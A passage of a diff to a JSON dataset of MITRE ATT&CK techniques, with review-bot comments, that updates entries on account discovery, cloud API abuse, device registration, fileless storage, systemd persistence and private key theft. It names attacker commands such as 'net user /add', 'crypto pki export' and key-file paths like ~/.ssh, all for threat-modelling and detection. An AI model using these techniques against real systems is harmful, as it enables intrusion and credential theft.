"https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts",
"https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh",
@@ -17955,7 +18214,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027/002",
- "https://capec.mitre.org/data/definitions/570.html",
"https://github.com/dhondta/awesome-executable-packing",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf"
]
@@ -18271,7 +18529,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1078/002",
- "https://capec.mitre.org/data/definitions/560.html",
"https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts",
"https://technet.microsoft.com/en-us/library/dn487457.aspx",
"https://technet.microsoft.com/en-us/library/dn535501.aspx",
@@ -18288,7 +18545,7 @@
"value": "Domain Accounts - T1078.002"
},
{
- "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\n\nCommands such as net user /domain
and net group /domain
of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups.",
+ "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as net user /domain
and net group /domain
of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups. ",
"meta": {
"external_id": "T1087.002",
"kill_chain": [
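Review bot: `Get-ADUser` and `Get-ADGroupMember` come from the ActiveDirectory module (RSAT), which is not present on a default workstation, yet the sentence lists them alongside built-in `net` commands as if they were always available; noting the dependency also gives defenders a signal, since that module appearing on a non-admin host is itself suspicious. Two nits: the description now ends with a trailing space after "groups.", and the new cmdlet names use the older inline-code markup rather than the backticks used by other entries updated in this patch.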
@@ -18307,8 +18564,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1087/002",
- "https://capec.mitre.org/data/definitions/575.html"
+ "https://attack.mitre.org/techniques/T1087/002"
]
},
"related": [
@@ -18488,7 +18744,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1505/003",
- "https://capec.mitre.org/data/definitions/650.html",
"https://github.com/nsacyber/Mitigating-Web-Shells",
"https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"https://www.us-cert.gov/ncas/alerts/TA15-314A",
@@ -18574,7 +18829,7 @@
"value": "Startup Items - T1037.005"
},
{
- "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole
PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups
will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups
lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl
API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
+ "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole
PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups
will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups
lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl
API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
"meta": {
"external_id": "T1069.003",
"kill_chain": [
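Review bot: `ListRolePolicies` and `ListAttachedRolePolicies` are IAM API actions, not commands (the CLI forms are `aws iam list-role-policies` and `aws iam list-attached-role-policies`), and they enumerate a role's inline and managed policies respectively, not groups. The surrounding paragraph is about permission groups, so either say "roles" explicitly or use the group-side analogues (`ListGroupsForUser`, `ListGroupPolicies`, `ListAttachedGroupPolicies`), which fit the text better. All of these calls are recorded in CloudTrail, which is the detection hook the entry currently leaves implicit; the Unit 42 reference added in the next hunk is the source for the role-enumeration claim.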
@@ -18601,6 +18856,7 @@
"https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest",
"https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0",
"https://github.com/True-Demon/raindance",
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/",
"https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/"
]
},
@@ -18773,7 +19029,7 @@
"value": "Unix Shell - T1059.004"
},
{
- "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.\n\nOnce a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.",
+ "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management systems, such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.\n\nOnce a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.",
"meta": {
"external_id": "T1078.004",
"kill_chain": [
@@ -18941,7 +19197,7 @@
"value": "Proc Memory - T1055.009"
},
{
- "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. 
Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)",
+ "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. 
Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)",
"meta": {
"external_id": "T1608.005",
"kill_chain": [
@@ -18956,6 +19212,7 @@
"refs": [
"https://attack.mitre.org/techniques/T1608/005",
"https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/",
+ "https://blog.talosintelligence.com/ipfs-abuse/",
"https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/",
"https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service",
"https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection",
@@ -18972,7 +19229,7 @@
"value": "Link Target - T1608.005"
},
{
- "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds)\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)",
+ "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)",
"meta": {
"external_id": "T1098.005",
"kill_chain": [
@@ -18995,6 +19252,7 @@
"https://o365blog.com/post/mdm",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-074a",
"https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack",
+ "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft",
"https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa",
"https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
]
@@ -19008,6 +19266,37 @@
"uuid": "7decb26c-715c-40cf-b7e0-026f7d7cc215",
"value": "Device Registration - T1098.005"
},
+ {
+ "description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: A), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006). \n\nCloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.\n\nWith proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment. ",
+ "meta": {
+ "external_id": "T1059.009",
+ "kill_chain": [
+ "mitre-attack:execution"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution"
+ ],
+ "mitre_platforms": [
+ "IaaS",
+ "Azure AD",
+ "Office 365",
+ "SaaS",
+ "Google Workspace"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1059/009",
+ "https://github.com/Azure/azure-powershell"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
+ "value": "Cloud API - T1059.009"
+ },
{
"description": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)\n\nTo help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)\n\nAdversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)\n\nSEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)",
"meta": {
@@ -19040,7 +19329,7 @@
"value": "SEO Poisoning - T1608.006"
},
{
- "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
+ "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
"meta": {
"external_id": "T1132.001",
"kill_chain": [
@@ -19095,7 +19384,36 @@
"value": "Symmetric Cryptography - T1521.001"
},
{
- "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add
command can be used to create a local account. On macOS systems the dscl -create
command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+ "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.\n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ",
+ "meta": {
+ "external_id": "T1027.011",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "WMI: WMI Creation",
+ "Windows Registry: Windows Registry Key Creation"
+ ],
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1027/011",
+ "https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats",
+ "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "value": "Fileless Storage - T1027.011"
+ },
+ {
+ "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add
command can be used to create a local account. On macOS systems the dscl -create
command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username
.(Citation: cisco_username_cmd)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
"meta": {
"external_id": "T1136.001",
"kill_chain": [
@@ -19109,11 +19427,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1136/001",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630"
]
},
"related": [
@@ -19358,7 +19678,6 @@
"http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research",
"http://www.uefi.org/about",
"https://attack.mitre.org/techniques/T1542/001",
- "https://capec.mitre.org/data/definitions/532.html",
"https://en.wikipedia.org/wiki/BIOS",
"https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface",
"https://github.com/chipsec/chipsec",
@@ -19551,7 +19870,7 @@
"value": "Business Relationships - T1591.002"
},
{
- "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.",
+ "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.\n\nOnce an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).",
"meta": {
"external_id": "T1136.003",
"kill_chain": [
@@ -20162,7 +20481,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1566/001",
- "https://capec.mitre.org/data/definitions/163.html",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
"https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
@@ -20323,7 +20641,7 @@
"value": "Device Lockout - T1629.002"
},
{
- "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system
and /usr/lib/systemd/system
directories and have the file extension .service
. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system
and /usr/lib/systemd/system
directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/
to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
+ "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). (Citation: lambert systemd 2022) \n\nService unit files use the following directives to execute system commands:(Citation: freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives cover execution of commands when a service is started manually by `systemctl`, or on system start if the service is set to automatically start.\n* `ExecReload` directive covers when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives cover when a service is stopped. \n\nAdversaries may abuse systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files systemd uses upon reboot or starting a service.(Citation: Anomali Rocke March 2019) Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.\n\nThe `.service` file’s `User` directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.(Citation: Rapid7 Service Persistence 22JUNE2016) ",
"meta": {
"external_id": "T1543.002",
"kill_chain": [
@@ -20344,10 +20662,10 @@
"refs": [
"http://man7.org/linux/man-pages/man1/systemd.1.html",
"https://attack.mitre.org/techniques/T1543/002",
- "https://capec.mitre.org/data/definitions/550.html",
- "https://capec.mitre.org/data/definitions/551.html",
+ "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/",
+ "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/",
"https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
- "https://www.freedesktop.org/wiki/Software/systemd/",
+ "https://www.freedesktop.org/software/systemd/man/systemd.service.html",
"https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence"
]
},
@@ -20595,7 +20913,7 @@
"value": "TFTP Boot - T1542.005"
},
{
- "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.",
+ "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.",
"meta": {
"external_id": "T1552.004",
"kill_chain": [
@@ -20608,13 +20926,17 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
+ "https://aadinternals.com/post/deviceidentity/",
